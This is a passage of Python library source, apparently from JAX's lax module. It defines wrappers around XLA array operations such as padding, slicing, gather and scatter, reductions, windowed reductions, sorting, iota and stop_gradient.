return reshape_p.bind(
operand, new_sizes=new_sizes,
dimensions=None if dimensions is None or same_dims else tuple(dimensions))
def pad(operand: Array, padding_value: Array,
padding_config: Sequence[Tuple[int, int, int]]) -> Array:
"""Applies low, high, and/or interior padding to an array.
Wraps XLA's `Pad
<https://www.tensorflow.org/xla/operation_semantics#pad>`_
operator.
Args:
operand: an array to be padded.
padding_value: the value to be inserted as padding. Must have the same dtype
as ``operand``.
padding_config: a sequence of ``(low, high, interior)`` tuples of integers,
giving the amount of low, high, and interior (dilation) padding to insert
in each dimension.
Returns:
The ``operand`` array with padding value ``padding_value`` inserted in each
dimension according to the ``padding_config``.
"""
return pad_p.bind(operand, padding_value, padding_config=tuple(padding_config))
def rev(operand: Array, dimensions: Sequence[int]) -> Array:
"""Wraps XLA's `Rev
<https://www.tensorflow.org/xla/operation_semantics#rev_reverse>`_
operator.
"""
return rev_p.bind(operand, dimensions=tuple(dimensions))
def select(pred: Array, on_true: Array, on_false: Array) -> Array:
"""Wraps XLA's `Select
<https://www.tensorflow.org/xla/operation_semantics#select>`_
operator.
"""
return select_p.bind(pred, on_true, on_false)
def slice(operand: Array, start_indices: Sequence[int],
limit_indices: Sequence[int],
strides: Optional[Sequence[int]] = None) -> Array:
"""Wraps XLA's `Slice
<https://www.tensorflow.org/xla/operation_semantics#slice>`_
operator.
"""
return slice_p.bind(operand, start_indices=tuple(start_indices),
limit_indices=tuple(limit_indices),
strides=None if strides is None else tuple(strides))
def dynamic_slice(operand: Array, start_indices: Sequence[Array],
slice_sizes: Shape) -> Array:
"""Wraps XLA's `DynamicSlice
<https://www.tensorflow.org/xla/operation_semantics#dynamicslice>`_
operator.
Args:
operand: an array to slice.
start_indices: a list of scalar indices, one per dimension. These values
may be dynamic.
slice_sizes: the size of the slice. Must be a sequence of non-negative
integers with length equal to `ndim(operand)`. Inside a JIT compiled
function, only static values are supported (all JAX arrays inside JIT
must have statically known size).
Returns:
An array containing the slice.
"""
start_indices = _dynamic_slice_indices(operand, start_indices)
return dynamic_slice_p.bind(operand, *start_indices,
slice_sizes=tuple(slice_sizes))
def dynamic_update_slice(operand: Array, update: Array,
start_indices: Array) -> Array:
"""Wraps XLA's `DynamicUpdateSlice
<https://www.tensorflow.org/xla/operation_semantics#dynamicupdateslice>`_
operator.
Args:
operand: an array to slice.
update: an array containing the new values to write onto `operand`.
start_indices: a list of scalar indices, one per dimension.
Returns:
An array containing the slice.
"""
start_indices = _dynamic_slice_indices(operand, start_indices)
return dynamic_update_slice_p.bind(operand, update, *start_indices)
class GatherDimensionNumbers(NamedTuple):
"""
Describes the dimension number arguments to an `XLA's Gather operator
<https://www.tensorflow.org/xla/operation_semantics#gather>`_. See the XLA
documentation for more details of what the dimension numbers mean.
Args:
offset_dims: the set of dimensions in the `gather` output that offset into
an array sliced from `operand`. Must be a tuple of integers in ascending
order, each representing a dimension number of the output.
collapsed_slice_dims: the set of dimensions `i` in `operand` that have
`slice_sizes[i] == 1` and that should not have a corresponding dimension
in the output of the gather. Must be a tuple of integers in ascending
order.
start_index_map: for each dimension in `start_indices`, gives the
corresponding dimension in `operand` that is to be sliced. Must be a
tuple of integers with size equal to `start_indices.shape[-1]`.
Unlike XLA's `GatherDimensionNumbers` structure, `index_vector_dim` is
implicit; there is always an index vector dimension and it must always be the
last dimension. To gather scalar indices, add a trailing dimension of size 1.
"""
offset_dims: Sequence[int]
collapsed_slice_dims: Sequence[int]
start_index_map: Sequence[int]
def gather(operand: Array, start_indices: Array,
dimension_numbers: GatherDimensionNumbers,
slice_sizes: Shape) -> Array:
"""Gather operator.
Wraps `XLA's Gather operator
<https://www.tensorflow.org/xla/operation_semantics#gather>`_.
The semantics of gather are complicated, and its API might change in the
future. For most use cases, you should prefer `Numpy-style indexing
<https://docs.scipy.org/doc/numpy-1.16.0/reference/arrays.indexing.html>`_
(e.g., `x[:, (1,4,7), ...]`), rather than using `gather` directly.
Args:
operand: an array from which slices should be taken
start_indices: the indices at which slices should be taken
dimension_numbers: a `lax.GatherDimensionNumbers` object that describes
how dimensions of `operand`, `start_indices` and the output relate.
slice_sizes: the size of each slice. Must be a sequence of non-negative
integers with length equal to `ndim(operand)`.
Returns:
An array containing the gather output.
"""
return gather_p.bind(
operand, start_indices, dimension_numbers=dimension_numbers,
slice_sizes=canonicalize_shape(slice_sizes))
class ScatterDimensionNumbers(NamedTuple):
"""
Describes the dimension number arguments to an `XLA's Scatter operator
<https://www.tensorflow.org/xla/operation_semantics#scatter>`_. See the XLA
documentation for more details of what the dimension numbers mean.
Args:
update_window_dims: the set of dimensions in the `updates` that are window
dimensions. Must be a tuple of integers in ascending
order, each representing a dimension number.
inserted_window_dims: the set of size 1 window dimensions that must be inserted
into the shape of `updates`. Must be a tuple of integers in ascending
order, each representing a dimension number of the output. These are the
mirror image of `collapsed_slice_dims` in the case of `gather`.
scatter_dims_to_operand_dims: for each dimension in `scatter_indices`, gives
the corresponding dimension in `operand`. Must be a sequence of integers
with size equal to indices.shape[-1].
Unlike XLA's `ScatterDimensionNumbers` structure, `index_vector_dim` is
implicit; there is always an index vector dimension and it must always be the
last dimension. To scatter scalar indices, add a trailing dimension of size 1.
"""
update_window_dims: Sequence[int]
inserted_window_dims: Sequence[int]
scatter_dims_to_operand_dims: Sequence[int]
def scatter_add(operand: Array, scatter_indices: Array, updates: Array,
dimension_numbers: ScatterDimensionNumbers, *,
indices_are_sorted: bool = False,
unique_indices: bool = False) -> Array:
"""Scatter-add operator.
Wraps `XLA's Scatter operator
<https://www.tensorflow.org/xla/operation_semantics#scatter>`_, where
addition is used to combine updates and values from `operand`.
The semantics of scatter are complicated and its API is subject to change.
Args:
operand: an array to which the scatter should be applied
scatter_indices: an array that gives the indices in `operand` to which each
update in `updates` should be applied.
updates: the updates that should be scattered onto `operand`.
dimension_numbers: a `lax.ScatterDimensionNumbers` object that describes
how dimensions of `operand`, `start_indices`, `updates` and the output
relate.
indices_are_sorted: whether `scatter_indices` is known to be sorted. If
true, may improve performance on some backends.
unique_indices: whether the indices to be updated in ``operand`` are
guaranteed to not overlap with each other. If true, may improve performance on
some backends.
Returns:
An array containing the sum of `operand` and the scattered updates.
"""
jaxpr, consts = _reduction_jaxpr(add, _abstractify(_const(operand, 0)))
return scatter_add_p.bind(
operand, scatter_indices, updates, update_jaxpr=jaxpr,
update_consts=consts, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
def scatter_mul(operand: Array, scatter_indices: Array, updates: Array,
dimension_numbers: ScatterDimensionNumbers, *,
indices_are_sorted: bool = False,
unique_indices: bool = False) -> Array:
"""Scatter-multiply operator.
Wraps `XLA's Scatter operator
<https://www.tensorflow.org/xla/operation_semantics#scatter>`_, where
multiplication is used to combine updates and values from `operand`.
The semantics of scatter are complicated and its API is subject to change.
Args:
operand: an array to which the scatter should be applied
scatter_indices: an array that gives the indices in `operand` to which each
update in `updates` should be applied.
updates: the updates that should be scattered onto `operand`.
dimension_numbers: a `lax.ScatterDimensionNumbers` object that describes
how dimensions of `operand`, `start_indices`, `updates` and the output
relate.
indices_are_sorted: whether `scatter_indices` is known to be sorted. If
true, may improve performance on some backends.
unique_indices: whether the indices to be updated in ``operand`` are
guaranteed to not overlap with each other. If true, may improve performance on
some backends.
Returns:
An array containing the sum of `operand` and the scattered updates.
"""
jaxpr, consts = _reduction_jaxpr(mul, _abstractify(_const(operand, 1)))
return scatter_mul_p.bind(
operand, scatter_indices, updates, update_jaxpr=jaxpr,
update_consts=consts, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
def scatter_min(operand: Array, scatter_indices: Array, updates: Array,
dimension_numbers: ScatterDimensionNumbers, *,
indices_are_sorted: bool = False,
unique_indices: bool = False) -> Array:
"""Scatter-min operator.
Wraps `XLA's Scatter operator
<https://www.tensorflow.org/xla/operation_semantics#scatter>`_, where
the `min` function is used to combine updates and values from `operand`.
The semantics of scatter are complicated and its API is subject to change.
Args:
operand: an array to which the scatter should be applied
scatter_indices: an array that gives the indices in `operand` to which each
update in `updates` should be applied.
updates: the updates that should be scattered onto `operand`.
dimension_numbers: a `lax.ScatterDimensionNumbers` object that describes
how dimensions of `operand`, `start_indices`, `updates` and the output
relate.
indices_are_sorted: whether `scatter_indices` is known to be sorted. If
true, may improve performance on some backends.
unique_indices: whether the indices to be updated in ``operand`` are
guaranteed to not overlap with each other. If true, may improve performance on
some backends.
Returns:
An array containing the sum of `operand` and the scattered updates.
"""
jaxpr, consts = _reduction_jaxpr(min, _abstractify(_const(operand, 0)))
return scatter_min_p.bind(
operand, scatter_indices, updates, update_jaxpr=jaxpr,
update_consts=consts, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
def scatter_max(operand: Array, scatter_indices: Array, updates: Array,
dimension_numbers: ScatterDimensionNumbers, *,
indices_are_sorted: bool = False,
unique_indices: bool = False) -> Array:
"""Scatter-max operator.
Wraps `XLA's Scatter operator
<https://www.tensorflow.org/xla/operation_semantics#scatter>`_, where
the `max` function is used to combine updates and values from `operand`.
The semantics of scatter are complicated and its API is subject to change.
Args:
operand: an array to which the scatter should be applied
scatter_indices: an array that gives the indices in `operand` to which each
update in `updates` should be applied.
updates: the updates that should be scattered onto `operand`.
dimension_numbers: a `lax.ScatterDimensionNumbers` object that describes
how dimensions of `operand`, `start_indices`, `updates` and the output
relate.
indices_are_sorted: whether `scatter_indices` is known to be sorted. If
true, may improve performance on some backends.
unique_indices: whether the indices to be updated in ``operand`` are
guaranteed to not overlap with each other. If true, may improve performance on
some backends.
Returns:
An array containing the sum of `operand` and the scattered updates.
"""
jaxpr, consts = _reduction_jaxpr(max, _abstractify(_const(operand, 0)))
return scatter_max_p.bind(
operand, scatter_indices, updates, update_jaxpr=jaxpr,
update_consts=consts, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
# Define this outside of scatter to ensure cache hits.
_scatter_reduction_computation = lambda x, y: y
def scatter(operand: Array, scatter_indices: Array, updates: Array,
dimension_numbers: ScatterDimensionNumbers, *,
indices_are_sorted: bool = False,
unique_indices: bool = False) -> Array:
"""Scatter-update operator.
Wraps `XLA's Scatter operator
<https://www.tensorflow.org/xla/operation_semantics#scatter>`_, where updates
replace values from `operand`.
If multiple updates are performed to the same index of operand, they may be
applied in any order.
The semantics of scatter are complicated and its API is subject to change.
Args:
operand: an array to which the scatter should be applied
scatter_indices: an array that gives the indices in `operand` to which each
update in `updates` should be applied.
updates: the updates that should be scattered onto `operand`.
dimension_numbers: a `lax.ScatterDimensionNumbers` object that describes
how dimensions of `operand`, `start_indices`, `updates` and the output
relate.
indices_are_sorted: whether `scatter_indices` is known to be sorted. If
true, may improve performance on some backends.
unique_indices: whether the indices to be updated in ``operand`` are
guaranteed to not overlap with each other. If true, may improve performance on
some backends.
Returns:
An array containing the sum of `operand` and the scattered updates.
"""
jaxpr, consts = _reduction_jaxpr(_scatter_reduction_computation,
_abstractify(_const(operand, 0)))
return scatter_p.bind(
operand, scatter_indices, updates, update_jaxpr=jaxpr,
update_consts=consts, dimension_numbers=dimension_numbers,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
def index_take(src: Array, idxs: Array, axes: Sequence[int]) -> Array:
indices = concatenate([expand_dims(i, (1,)) for i in idxs], 1)
indices = indices % np.array([src.shape[ax] for ax in axes])
slice_sizes = list(src.shape)
for ax in axes:
slice_sizes[ax] = 1
offset_dims = tuple(range(1, src.ndim - indices.shape[1] + 1))
dnums = GatherDimensionNumbers(
offset_dims=offset_dims,
collapsed_slice_dims=axes,
start_index_map=axes)
return gather(src, indices, dimension_numbers=dnums,
slice_sizes=tuple(slice_sizes))
def transpose(operand: Array, permutation: Sequence[int]) -> Array:
"""Wraps XLA's `Transpose
<https://www.tensorflow.org/xla/operation_semantics#transpose>`_
operator.
"""
permutation = tuple(permutation)
if permutation == tuple(range(len(permutation))):
return operand
else:
return transpose_p.bind(operand, permutation=permutation)
def argmin(operand: Array, axis: int,
index_dtype: DType) -> Tuple[Array, Array]:
"""Computes the index of the minimum element along ``axis``."""
return argmin_p.bind(operand, axes=(axis,),
index_dtype=dtypes.canonicalize_dtype(index_dtype))
def argmax(operand: Array, axis: int,
index_dtype: DType) -> Tuple[Array, Array]:
"""Computes the index of the maximum element along ``axis``."""
return argmax_p.bind(operand, axes=(axis,),
index_dtype=dtypes.canonicalize_dtype(index_dtype))
def reduce(operands: Array, init_values: Array, computation: Callable,
dimensions: Sequence[int]) -> Array:
"""Wraps XLA's `Reduce
<https://www.tensorflow.org/xla/operation_semantics#reduce>`_
operator.
``init_values`` and ``computation`` together must form a `monoid
<https://en.wikipedia.org/wiki/Monoid>`_
for correctness. That is ``init_values`` must be an identity of
``computation``, and ``computation`` must be associative. XLA may exploit both
of these properties during code generation; if either is violated the result
is undefined.
"""
flat_operands, operand_tree = tree_util.tree_flatten(operands)
flat_init_values, init_value_tree = tree_util.tree_flatten(init_values)
if operand_tree != init_value_tree:
raise ValueError('Operands must have the same tree structure as init_values:'
f' {operand_tree} vs. {init_value_tree}')
if len(flat_operands) != len(flat_init_values):
raise ValueError('Must have same total number of operands as init_values: '
f' {len(flat_operands)} vs. {len(flat_init_values)}')
monoid_reducer = _get_monoid_reducer(computation, flat_init_values)
if monoid_reducer:
# monoid reducers bypass the weak_type_rule, so we set it explicitly.
weak_type = dtypes.is_weakly_typed(*flat_operands) and dtypes.is_weakly_typed(*flat_init_values)
return convert_element_type(monoid_reducer(*flat_operands, dimensions), weak_type=weak_type)
else:
flat_init_avals = safe_map(_abstractify, flat_init_values)
jaxpr, consts, out_tree = _variadic_reduction_jaxpr(
computation, tuple(flat_init_avals), init_value_tree)
out = reduce_p.bind(*(flat_operands + flat_init_values), computation=computation,
jaxpr=jaxpr, consts=consts, dimensions=tuple(dimensions))
return tree_util.tree_unflatten(out_tree, out)
@cache()
def _reduction_jaxpr(computation, aval):
pval = pe.PartialVal.unknown(aval)
@lu.wrap_init
def comp(x, y):
result = computation(x, y)
if not (isinstance(result, core.Tracer) or core.valid_jaxtype(result)):
raise ValueError(
f"Invalid return type from reduction function: {type(result)}\n"
f"Reduction functions should only return an array.\n"
f"Full return value: {result}")
return (result,)
jaxpr, _, consts = pe.trace_to_jaxpr(comp, (pval, pval), instantiate=False)
return jaxpr, consts
@cache()
def _variadic_reduction_jaxpr(computation, flat_avals, aval_tree):
avals = tree_util.tree_unflatten(aval_tree, flat_avals)
flat_in_avals, in_tree = tree_util.tree_flatten((avals, avals))
pvals = safe_map(pe.PartialVal.unknown, flat_in_avals)
comp = lu.wrap_init(computation)
flat_comp, out_tree = api_util.flatten_fun_nokwargs(comp, in_tree)
jaxpr, _, consts = pe.trace_to_jaxpr(flat_comp, tuple(pvals),
instantiate=False)
return jaxpr, consts, out_tree()
def _get_monoid_reducer(monoid_op: Callable, xs: Array) -> Optional[Callable]:
if len(xs) != 1:
return None
x, = xs
aval = core.get_aval(x)
dtype = _dtype(x)
if (type(aval) is ConcreteArray) and aval.shape == ():
if monoid_op is add:
return np.equal(aval.val, 0) and partial(_reduce_sum)
elif monoid_op is mul:
return np.equal(aval.val, 1) and _reduce_prod
elif monoid_op is bitwise_or and dtype == np.bool_:
return np.equal(aval.val, _get_max_identity(dtype)) and _reduce_or
elif monoid_op is bitwise_and and dtype == np.bool_:
return np.equal(aval.val, _get_min_identity(dtype)) and _reduce_and
elif monoid_op is max:
return np.equal(aval.val, _get_max_identity(dtype)) and _reduce_max
elif monoid_op is min:
return np.equal(aval.val, _get_min_identity(dtype)) and _reduce_min
return None
def _get_max_identity(dtype: DType) -> Array:
if dtypes.issubdtype(dtype, np.inexact):
return np.array(-np.inf, dtype)
elif dtypes.issubdtype(dtype, np.integer):
return np.array(dtypes.iinfo(dtype).min, dtype)
elif dtypes.issubdtype(dtype, np.bool_):
return np.array(False, np.bool_)
def _get_min_identity(dtype: DType) -> Array:
if dtypes.issubdtype(dtype, np.inexact):
return np.array(np.inf, dtype)
elif dtypes.issubdtype(dtype, np.integer):
return np.array(dtypes.iinfo(dtype).max, dtype)
elif dtypes.issubdtype(dtype, np.bool_):
return np.array(True, np.bool_)
def _reduce_sum(operand: Array, axes: Sequence[int]) -> Array:
return reduce_sum_p.bind(operand, axes=tuple(axes))
def _reduce_prod(operand: Array, axes: Sequence[int]) -> Array:
return reduce_prod_p.bind(operand, axes=tuple(axes))
def _reduce_max(operand: Array, axes: Sequence[int]) -> Array:
return reduce_max_p.bind(operand, axes=tuple(axes))
def _reduce_min(operand: Array, axes: Sequence[int]) -> Array:
return reduce_min_p.bind(operand, axes=tuple(axes))
def _reduce_or(operand: Array, axes: Sequence[int]) -> Array:
return reduce_or_p.bind(operand, axes=tuple(axes))
def _reduce_and(operand: Array, axes: Sequence[int]) -> Array:
return reduce_and_p.bind(operand, axes=tuple(axes))
def reduce_window(operand: Array, init_value: Array, computation: Callable,
window_dimensions: Shape, window_strides: Sequence[int],
padding: Union[str, Sequence[Tuple[int, int]]],
base_dilation: Optional[Sequence[int]] = None,
window_dilation: Optional[Sequence[int]] = None) -> Array:
"""Wraps XLA's `ReduceWindowWithGeneralPadding
<https://www.tensorflow.org/xla/operation_semantics#reducewindow>`_
operator.
"""
if isinstance(padding, str):
dilated_window_dims = (window_dimensions if window_dilation is None else
_dilate_shape(window_dimensions, window_dilation))
padding = tuple(padtype_to_pads(operand.shape, dilated_window_dims,
window_strides, padding))
else:
padding = tuple(padding)
if base_dilation is None:
base_dilation = (1,) * len(window_dimensions)
if window_dilation is None:
window_dilation = (1,) * len(window_dimensions)
monoid_reducer = _get_monoid_window_reducer(computation, init_value)
if monoid_reducer:
return monoid_reducer(operand, window_dimensions, window_strides, padding,
base_dilation, window_dilation)
else:
jaxpr, consts = _reduction_jaxpr(computation, _abstractify(init_value))
return reduce_window_p.bind(
operand, init_value, jaxpr=jaxpr, consts=consts,
window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=padding,
base_dilation=tuple(base_dilation),
window_dilation=tuple(window_dilation))
def _get_monoid_window_reducer(monoid_op: Callable, x: Array) -> Optional[Callable]:
aval = core.get_aval(x)
if (type(aval) is ConcreteArray) and aval.shape == ():
if monoid_op is add:
return aval.val == 0 and _reduce_window_sum
elif monoid_op is max:
return aval.val == _get_max_identity(aval.dtype) and _reduce_window_max
elif monoid_op is min:
return aval.val == _get_min_identity(aval.dtype) and _reduce_window_min
return None
def _reduce_window_sum(operand: Array, window_dimensions: Shape,
window_strides: Sequence[int],
padding: Sequence[Tuple[int, int]],
base_dilation: Optional[Sequence[int]] = None,
window_dilation: Optional[Sequence[int]] = None) -> Array:
if base_dilation is None:
base_dilation = (1,) * len(window_dimensions)
if window_dilation is None:
window_dilation = (1,) * len(window_dimensions)
return reduce_window_sum_p.bind(
operand, window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=tuple(padding),
base_dilation=tuple(base_dilation),
window_dilation=tuple(window_dilation))
def _reduce_window_prod(operand: Array, window_dimensions: Shape,
window_strides: Sequence[int],
padding: Sequence[Tuple[int, int]],
base_dilation: Optional[Sequence[int]] = None,
window_dilation: Optional[Sequence[int]] = None) -> Array:
init_value = _const(operand, 1)
jaxpr, consts = _reduction_jaxpr(mul, _abstractify(init_value))
if base_dilation is None:
base_dilation = (1,) * len(window_dimensions)
if window_dilation is None:
window_dilation = (1,) * len(window_dimensions)
return reduce_window_p.bind(
operand, init_value, jaxpr=jaxpr, consts=consts,
window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=tuple(padding),
base_dilation=tuple(base_dilation),
window_dilation=tuple(window_dilation))
def _reduce_window_max(operand: Array, window_dimensions: Shape,
window_strides: Sequence[int],
padding: Sequence[Tuple[int, int]],
base_dilation: Optional[Sequence[int]] = None,
window_dilation: Optional[Sequence[int]] = None) -> Array:
if base_dilation is None:
base_dilation = (1,) * len(window_dimensions)
if window_dilation is None:
window_dilation = (1,) * len(window_dimensions)
return reduce_window_max_p.bind(
operand, window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=tuple(padding),
base_dilation=tuple(base_dilation),
window_dilation=tuple(window_dilation))
def _reduce_window_min(operand: Array, window_dimensions: Shape,
window_strides: Sequence[int],
padding: Sequence[Tuple[int, int]],
base_dilation: Optional[Sequence[int]] = None,
window_dilation: Optional[Sequence[int]] = None) -> Array:
if base_dilation is None:
base_dilation = (1,) * len(window_dimensions)
if window_dilation is None:
window_dilation = (1,) * len(window_dimensions)
return reduce_window_min_p.bind(
operand, window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=tuple(padding),
base_dilation=tuple(base_dilation),
window_dilation=tuple(window_dilation))
def _select_and_scatter(operand: Array, select: Callable,
window_dimensions: Shape, window_strides: Sequence[int],
padding: Sequence[Tuple[int, int]], source: Array,
init_value: Array, scatter: Callable,
base_dilation: Sequence[int],
window_dilation: Sequence[int]) -> Array:
select_jaxpr, select_consts = _reduction_jaxpr(select, _abstractify(init_value))
scatter_jaxpr, scatter_consts = _reduction_jaxpr(scatter, _abstractify(init_value))
return select_and_scatter_p.bind(
operand, source, init_value, select_jaxpr=select_jaxpr,
select_consts=select_consts, scatter_jaxpr=scatter_jaxpr,
scatter_consts=scatter_consts, window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=tuple(padding),
base_dilation=tuple(base_dilation),
window_dilation=tuple(window_dilation))
def _select_and_scatter_add(source: Array, operand: Array,
select_prim: core.Primitive,
window_dimensions: Shape,
window_strides: Sequence[int],
padding: Sequence[Tuple[int, int]]) -> Array:
return select_and_scatter_add_p.bind(
source, operand, select_prim=select_prim,
window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=tuple(padding))
def _select_and_gather_add(tangents: Array, operand: Array,
select_prim: core.Primitive,
window_dimensions: Shape,
window_strides: Sequence[int],
padding: Sequence[Tuple[int, int]],
base_dilation: Sequence[int],
window_dilation: Sequence[int]) -> Array:
"""Extracts the tangent corresponding to the minimum or maximum element in each
window of the `operand` array.
Wraps XLA's `ReduceWindow
<https://www.tensorflow.org/xla/operation_semantics#reducewindow>`_
operator, which applies a reduction function to all elements in each window of the
input multi-dimensional array. In this case, the input multi-dimensional array is
built by packing each element in the `operand` array with its corresponding
element in the `tangents` array.
Args:
tangents: an array
operand: an array with the same shape as `tangents`
select_prim: a reduction function (restricted to `ge_p` and `le_p`)
window_dimensions: an array of integers for window dimension values
window_strides: an array of integers for window stride values
base_dilation: an array of integers for base dilation values
window_dilation: an array of integers for window dilation values
Returns:
An array containing the elements in `tangents` corresponding to the output of the
reduction of `operand` fin each window.
"""
return select_and_gather_add_p.bind(
tangents, operand, select_prim=select_prim,
window_dimensions=tuple(window_dimensions),
window_strides=tuple(window_strides), padding=tuple(padding),
base_dilation=tuple(base_dilation),
window_dilation=tuple(window_dilation))
def sort(operand: Union[Array, Sequence[Array]], dimension: int = -1,
is_stable: bool = True, num_keys: int = 1) -> Union[Array, Tuple[Array, ...]]:
"""Wraps XLA's `Sort
<https://www.tensorflow.org/xla/operation_semantics#sort>`_
operator.
Args:
operand : Array or sequence of arrays
dimension : integer dimension along which to sort. Default: -1.
is_stable : boolean specifying whether to use a stable sort. Default: True.
num_keys : number of operands to treat as sort keys. Default: 1.
For num_keys > 1, the sort order will be determined lexicographically using
the first `num_keys` arrays, with the first key being primary.
The remaining operands will be returned with the same permutation.
Returns:
operand : sorted version of the input or inputs.
"""
if isinstance(operand, Sequence):
if len(operand) == 0:
raise TypeError("Sort requires at least one operand")
if not (1 <= num_keys <= len(operand)):
raise ValueError(f"num_keys={num_keys} must be between 1 and len(operand)={len(operand)}")
dimension = canonicalize_axis(dimension, len(operand[0].shape))
return tuple(sort_p.bind(*operand, dimension=dimension,
is_stable=is_stable,
num_keys=num_keys))
else:
if num_keys != 1:
raise ValueError(f"num_keys={num_keys} must equal 1 for a single operand.")
dimension = canonicalize_axis(dimension, len(operand.shape))
return sort_p.bind(operand, dimension=dimension, is_stable=is_stable, num_keys=1)[0]
def sort_key_val(keys: Array, values: Array, dimension: int = -1,
is_stable: bool = True) -> Tuple[Array, Array]:
"""Sorts ``keys`` along ``dimension`` and applies same permutation to ``values``."""
dimension = canonicalize_axis(dimension, len(keys.shape))
k, v = sort_p.bind(keys, values, dimension=dimension, is_stable=is_stable, num_keys=1)
return k, v
def top_k(operand: Array, k: int) -> Tuple[Array, Array]:
"""Returns top ``k`` values and their indices along the last axis of ``operand``."""
k = int(k)
if k < 0:
raise ValueError("k argument to top_k must be nonnegative, got {}".format(k))
return top_k_p.bind(operand, k=k)
def tie_in(x: Array, y: Array) -> Array:
"""Deprecated. Ignores ``x`` and returns ``y``."""
return y
def full(shape: Shape, fill_value: Array, dtype: Optional[DType] = None) -> Array:
"""Returns an array of `shape` filled with `fill_value`.
Args:
shape: sequence of integers, describing the shape of the output array.
fill_value: the value to fill the new array with.
dtype: the type of the output array, or `None`. If not `None`, `fill_value`
will be cast to `dtype`.
"""
shape = canonicalize_shape(shape)
if np.shape(fill_value):
msg = "full must be called with scalar fill_value, got fill_value.shape {}."
raise TypeError(msg.format(np.shape(fill_value)))
weak_type = dtype is None and dtypes.is_weakly_typed(fill_value)
dtype = dtypes.canonicalize_dtype(dtype or _dtype(fill_value))
fill_value = convert_element_type(fill_value, dtype, weak_type)
return broadcast(fill_value, shape)
def _device_put_raw(x, weak_type=None):
if isinstance(x, xla.DeviceArray):
return x
else:
aval = raise_to_shaped(core.get_aval(x), weak_type=weak_type)
return xla.array_result_handler(None, aval)(*xla.device_put(x))
def iota(dtype: DType, size: int) -> Array:
"""Wraps XLA's `Iota
<https://www.tensorflow.org/xla/operation_semantics#iota>`_
operator.
"""
if config.omnistaging_enabled:
dtype = dtypes.canonicalize_dtype(dtype)
size = core.concrete_or_error(int, size, "size argument of lax.iota")
return iota_p.bind(dtype=dtype, shape=(size,), dimension=0)
else:
size = size if type(size) is masking.Poly else int(size)
shape = canonicalize_shape((size,))
dtype = dtypes.canonicalize_dtype(dtype)
lazy_expr = lazy.iota(dtype, shape[0])
aval = ShapedArray(shape, dtype)
return xla._DeviceArray(aval, None, lazy_expr, xla.DeviceConstant())
def broadcasted_iota(dtype: DType, shape: Shape, dimension: int) -> Array:
"""Convenience wrapper around ``iota``."""
dtype = dtypes.canonicalize_dtype(dtype)
shape = canonicalize_shape(shape)
dimension = core.concrete_or_error(
int, dimension, "dimension argument of lax.broadcasted_iota")
return iota_p.bind(dtype=dtype, shape=shape, dimension=dimension)
def _eye(dtype: DType, shape: Shape, offset: int) -> Array:
"""Like numpy.eye, create a 2D array with ones on a diagonal."""
N, M = tuple(map(int, shape))
offset = int(offset)
dtype = dtypes.canonicalize_dtype(dtype)
if config.omnistaging_enabled:
bool_eye = eq(add(broadcasted_iota(np.int32, (N, M), 0), np.int32(offset)),
broadcasted_iota(np.int32, (N, M), 1))
return convert_element_type_p.bind(bool_eye, new_dtype=dtype, weak_type=False)
else:
lazy_expr = lazy.eye(dtype, (N, M), offset)
aval = ShapedArray((N, M), dtype)
return xla._DeviceArray(aval, None, lazy_expr, xla.DeviceConstant())
def _delta(dtype: DType, shape: Shape, axes: Sequence[int]) -> Array:
"""This utility function exists for creating Kronecker delta arrays."""
shape = tuple(map(int, shape))
axes = tuple(map(int, axes))
dtype = dtypes.canonicalize_dtype(dtype)
base_shape = tuple(np.take(shape, axes)) # type: ignore[arg-type]
if config.omnistaging_enabled:
iotas = [broadcasted_iota(np.uint32, base_shape, i)
for i in range(len(base_shape))]
eyes = [eq(i1, i2) for i1, i2 in zip(iotas[:-1], iotas[1:])]
result = convert_element_type_p.bind(_reduce(operator.and_, eyes), new_dtype=dtype, weak_type=False)
return broadcast_in_dim(result, shape, axes)
else:
lazy_expr = lazy.broadcast(lazy.delta(dtype, base_shape), shape, axes)
aval = ShapedArray(shape, dtype)
return xla._DeviceArray(aval, None, lazy_expr, xla.DeviceConstant())
def _tri(dtype: DType, shape: Shape, offset: int) -> Array:
"""Like numpy.tri, create a 2D array with ones below a diagonal."""
N, M = tuple(map(int, shape))
offset = int(offset)
dtype = dtypes.canonicalize_dtype(dtype)
if config.omnistaging_enabled:
bool_tri = ge(add(broadcasted_iota(np.int32, (N, M), 0), np.int32(offset)),
broadcasted_iota(np.int32, (N, M), 1))
return convert_element_type_p.bind(bool_tri, new_dtype=dtype, weak_type=False)
else:
lazy_expr = lazy.tri(dtype, (N, M), offset)
aval = ShapedArray((N, M), dtype)
return xla._DeviceArray(aval, None, lazy_expr, xla.DeviceConstant())
def stop_gradient(x):
"""Stops gradient computation.
Operationally ``stop_gradient`` is the identity function, that is, it returns
argument `x` unchanged. However, ``stop_gradient`` prevents the flow of
gradients during forward or reverse-mode automatic differentiation. If there
are multiple nested gradient computations, ``stop_gradient`` stops gradients
for all of them.
For example:
>>> jax.grad(lambda x: x**2)(3.)
array(6., dtype=float32)
>>> jax.grad(lambda x: jax.lax.stop_gradient(x)**2)(3.)
array(0., dtype=float32)
>>> jax.grad(jax.grad(lambda x: x**2))(3.)
array(2., dtype=float32)
>>> jax.grad(jax.grad(lambda x: jax.lax.stop_gradient(x)**2))(3.)
array(0., dtype=float32)
"""
def stop(x):
if (dtypes.issubdtype(_dtype(x), np.floating) or
dtypes.issubdtype(_dtype(x), np.complexfloating)):
return ad_util.stop_gradient_p.bind(x)
else:
return x # only bind primitive on inexact dtypes, to avoid some staging
return tree_map(stop, x)
### convenience wrappers around traceables
def conv(lhs: Array, rhs: Array, window_strides: Sequence[int],
padding: str, precision: PrecisionLike = None) -> Array:
"""Convenience wrapper around `conv_general_dilated`.
Args:
